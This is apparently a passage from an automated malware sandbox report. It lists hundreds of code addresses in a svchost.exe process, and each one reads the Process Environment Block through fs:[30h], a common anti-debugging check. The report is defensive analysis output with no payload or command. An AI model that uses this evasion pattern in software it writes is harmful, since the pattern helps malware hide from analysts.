Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]	2_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]	2_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]	2_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]	2_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]	2_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]	2_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]	2_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]	2_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]	2_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]	2_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]	2_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]	2_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]	2_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]	2_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]	2_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]	2_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]	2_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]	2_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]	2_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]	2_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]	2_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]	2_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]	2_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]	2_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]	2_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]	2_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]	2_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]	2_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]	2_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]	2_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]	2_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]	2_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]	2_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]	2_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]	2_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]	2_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]	2_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]	2_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]	2_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]	2_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]	2_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]	2_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]	2_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]	2_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]	2_2_0336A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]	2_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]	2_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]	2_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]	2_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]	2_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
